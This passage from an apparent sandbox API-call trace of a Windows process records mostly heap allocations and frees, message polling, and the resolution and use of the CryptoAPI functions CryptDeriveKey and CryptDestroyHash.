| out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0157.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0157.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0157.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0157.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0157.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0157.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0157.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0157.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0157.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0157.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0157.999] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0157.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0157.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0157.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0157.999] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0157.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0157.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0157.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0158.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0158.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0158.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0158.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0158.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0158.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0158.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0158.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0158.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0158.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0158.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0158.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0158.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0158.001] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0158.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0158.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509f8 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0158.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0158.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0158.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0158.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0158.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0158.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0158.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0158.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0158.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0158.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0158.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0158.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0158.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0158.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0158.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0158.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0158.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50b00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0158.006] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0158.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0158.007] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87110, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87490) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0158.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0158.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0158.007] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.008] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0158.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0158.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0158.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69be8 [0158.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69be8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0158.009] CryptDestroyHash (hHash=0xa87110) returned 1 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0158.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0158.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0158.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0158.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0158.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0158.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0158.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0158.010] 